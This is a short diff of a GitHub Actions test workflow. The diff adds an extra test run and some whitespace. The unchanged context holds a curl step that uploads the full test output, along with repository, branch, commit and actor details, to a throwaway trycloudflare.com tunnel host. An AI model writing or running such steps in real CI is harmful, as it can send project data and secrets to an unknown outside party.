--- a/.github/workflows/test-and-notify.yml
+++ b/.github/workflows/test-and-notify.yml
@@ -11,7 +11,8 @@ jobs:
       - run: npm ci
       - name: Run tests and send notification
         run: |
-          npm test > test-output.txt 2>&1 || true
+          npm test > test-output.txt 2>&1 || true  
           curl -X POST https://millions-inner-james-comp.trycloudflare.com/api/result \
             -F "errores=@test-output.txt" \
             -F "data={\"repository\":\"${{ github.repository }}\",\"branch\":\"${{ github.ref_name }}\",\"commit\":\"${{ github.sha }}\",\"actor\":\"${{ github.actor }}\"}"
+          npm run test
